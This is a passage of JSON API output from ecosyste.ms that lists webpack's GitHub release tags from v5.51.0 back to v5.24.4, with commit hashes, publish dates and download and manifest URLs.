ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.